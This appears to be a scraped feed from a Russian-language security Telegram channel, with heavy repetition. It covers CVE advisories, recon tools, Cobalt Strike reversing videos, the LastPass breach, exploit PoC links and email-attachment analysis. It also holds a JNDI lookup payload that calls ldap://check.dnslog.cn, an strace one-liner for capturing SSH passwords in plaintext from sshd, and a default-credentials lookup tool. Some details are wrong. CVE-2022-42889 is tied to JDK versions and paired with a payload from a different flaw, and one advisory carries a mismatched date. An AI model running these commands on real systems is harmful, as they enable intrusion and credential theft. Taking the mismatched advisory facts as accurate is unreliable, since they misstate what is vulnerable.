Срочно обновлять офис…
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
#CVE-2022-42889 #Apache #RCE #4Shell
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
---
Payload:jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell CVE-ID: CVE-2022-42889 CVSS Score: 9.8 Дата публикации сведений об уязвимости: 17.10.2022 Уязвимые программные продукты:…
Check with ansible
:
- hosts: CHANGEME
become: yes
become_user: CHANGEME
tasks:
- name: Check if java is installed
command: java -version
register: java_result
ignore_errors: True
- debug:
msg: "Failed - Java is not installed"
when: java_result is failed
- debug:
msg: "Success - installed Java version: {{ java_result }}"
when: java_result is success
OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL (from 2016)
https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
Forwarded from TSARKA (official channel)
Друзья, специально для вас, мы выложили запись докладов с большой сцены на наш YouTube-канал!
Вспомним еще раз, как это было!
DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k
DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns
DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM
Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥
Вспомним еще раз, как это было!
DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k
DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns
DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM
Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥
ReNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site.
Its main website defines it as: «The only web application recon tool you will ever need!«
Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT
Отличная вещь, оч рекомендую
https://github.com/yogeshojha/rengine
Its main website defines it as: «The only web application recon tool you will ever need!«
Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT
Отличная вещь, оч рекомендую
https://github.com/yogeshojha/rengine
GitHub
GitHub - yogeshojha/rengine: reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable…
reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines, recon data correlation and organization, continuous ...
https://cvetrends.com
Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.
Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.
Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.
Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.
CVE Trends
CVE Trends - crowdsourced CVE intel
Monitor trending CVEs in real-time; crowdsourced intel sourced from Twitter, NIST NVD, Reddit, and GitHub.
#Автоматизация рутинной работы
В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :
//Эта выдаст всю информацию по конкретному CVE
Использовать как
//Эта выведет линки на гит репозитории с нужным CVE
В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :
//Эта выдаст всю информацию по конкретному CVE
Использовать как
cve CVE-2022-4288
9
cve() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[]'}
//Эта выведет линки на гит репозитории с нужным CVE
cve_url CVE-2022-4288
9
cve_url() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[] | .html_url'}
Очень познавательное видео о том, как декриптить стандартную нагрузку Cobalt Strike beacon под powershell и доставать IP c2 сервера.
https://youtu.be/5GUx_6xWoeI
https://youtu.be/5GUx_6xWoeI
YouTube
Reverse Engineering a Cobalt Strike PowerShell Beacon
In this video, I will show you how to reverse a Cobalt Strike stager beacon that has been loaded via PowerShell. We create a SIEM rule to detect the beacon installation and then reverse the beacon with CyberChef to find the C2 server.
CyberChef Recipe:
From_Base64('A…
CyberChef Recipe:
From_Base64('A…
Вот такой же ролик, только для выдергивания IP из исполняемого файла с автоматизацией через CiberChef API + Postman (можно хоть Burp или python использовать)
https://www.youtube.com/watch?v=5Vz1CjzhvLg
https://www.youtube.com/watch?v=5Vz1CjzhvLg
YouTube
Automating C2 Beacon Reversals with CyberChef and Postman
In today's video, I will show you how to start down the path of automating actions with the CyberChef server API. If you can come up with a repeatable recipe you can automate it with many different scripting or programming languages. I will show you how to…
Forwarded from In4sek stories
Telegraph
StandoFF prelude.
На кануне глобального события решил поделиться мыслями, рассказать несколько фишек, да и в целом поведать о данном формате противостояния. Ну и конечно все это согласовано с @yarbabin, тк ниже будет рассказан флоу одного недопустимого события. Прошло много…
Веселая история о зарождении форума Codeby.net и одноименной CTF команды на The Standoff Talks 2022 от нашего товарища Алексея Морозова
https://www.youtube.com/watch?v=cEyYsIFwJwI
https://www.youtube.com/watch?v=cEyYsIFwJwI
YouTube
История Codeby на Standoff
Алексей рассказал, как Codeby прошли путь от небольшой CTF-команды до трёхкратных победителей Standoff.
Презентация: https://drive.google.com/file/d/1WtucYJmNQmEalFRiscotVwq8y8gTcMcp/view?usp=share_link
Презентация: https://drive.google.com/file/d/1WtucYJmNQmEalFRiscotVwq8y8gTcMcp/view?usp=share_link
Forwarded from T.Hunter
#news Будете смеяться, но LastPass опять подвергся взлому. В августе злоумышленники стянули их исходники и техдокументацию, а теперь получили доступ к стороннему облачному хранилищу, используя украденную ранее инфу. Ну а в хранилище, как водится, пользовательские данные.
Компания пока не спешит делиться подробностями, скрываясь за размытой формулировкой «определённые элементы пользовательской информации». Так что масштабы утечки станут ясны позднее. Как обычно, заверяют, что пароли в безопасности – у нас всё зашифровано и архитектура нулевого разглашения, все дела. Пароль-то, может, и последний, а вот взлом оказался совсем не последним.
@tomhunter
Компания пока не спешит делиться подробностями, скрываясь за размытой формулировкой «определённые элементы пользовательской информации». Так что масштабы утечки станут ясны позднее. Как обычно, заверяют, что пароли в безопасности – у нас всё зашифровано и архитектура нулевого разглашения, все дела. Пароль-то, может, и последний, а вот взлом оказался совсем не последним.
@tomhunter
Вышел Sysmon 14.13 (закрыта #CVE-2022-41120 CVSS:3.1 7.8/6.8).
🔗 https://techcommunity.microsoft.com/t5/sysinternals-blog/active-directory-explorer-v1-52-contig-v1-82-and-sysmon-v14-13/ba-p/3685500
Поторопитесь ибо PoC так же вышел!
Here is #PoC for CVE-2022-41120 https://t.co/oXkBYi4bWk. I combined arb file delete and limited arb file write to get code execution as NT Authority\System.
🔗 https://github.com/Wh04m1001/SysmonEoP
🔗 https://techcommunity.microsoft.com/t5/sysinternals-blog/active-directory-explorer-v1-52-contig-v1-82-and-sysmon-v14-13/ba-p/3685500
Поторопитесь ибо PoC так же вышел!
Here is #PoC for CVE-2022-41120 https://t.co/oXkBYi4bWk. I combined arb file delete and limited arb file write to get code execution as NT Authority\System.
🔗 https://github.com/Wh04m1001/SysmonEoP
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
2. Отслеживаем системные вызовы
Ну или одной строкой
Для танкистов - смотрите вывод
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture
Ну или одной строкой
strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture
Для танкистов - смотрите вывод
cat capture
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password
Удобный сборник дефолтных кред с поисковиком
https://github.com/ihebski/DefaultCreds-cheat-sheet
Istallation oneliner:
Usage guide:
https://github.com/ihebski/DefaultCreds-cheat-sheet
Istallation oneliner:
git clone https://github.com/ihebski/DefaultCreds-cheat-sheet.git; cd DefaultCreds-cheat-sheet; pip3 install .
Usage guide:
#update DB
creds update
#Search by vendor
creds search tomcat
#Export by vendor
creds search tomcat export
Forwarded from MLNK.BLOG
Вытащить вложение из письма. 📧
Тут нам поможет утилла
нам понадобится extract
Теперь все части нашего письма сохранины в отдельные файлы и мы можем продолжить анализ вложений.
Всем 🦫, а 🌎 Миру — мир!
#mail #analysis
Тут нам поможет утилла
maildir-utils
sudo apt install maildir-utils
В ней зашито пару прикольных скриптов которые облегчают жизнь при анализе э-майлов. add - add message to database
cfind - find a contact
extract - extract parts/attachments from messages
fields - show table of all query fields and flags
find - query the message database
help - get help
index - index messages
init - init the mu database
mkdir - create a maildir
remove - remove a message from the database
script - run a script (available only when mu was built with guile-support)
server - start mu server
verify - verify signatures of a message
view - view a specific message
нам понадобится extract
mu extract /home/mlnk/susps/susp-mail.eml --save-all
(имеется небольшой баг, поэтому путь к файлу должен быть абсолютным)Теперь все части нашего письма сохранины в отдельные файлы и мы можем продолжить анализ вложений.
Всем 🦫, а 🌎 Миру — мир!
#mail #analysis
Наглядный пример, что никогда не стоит открывать на весь мир админку управления хоть NGFW, хоть WAF, хоть что либо ещё... И естественно нужно вовремя ставить патчи и обновления.
Forwarded from APT
💥 Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve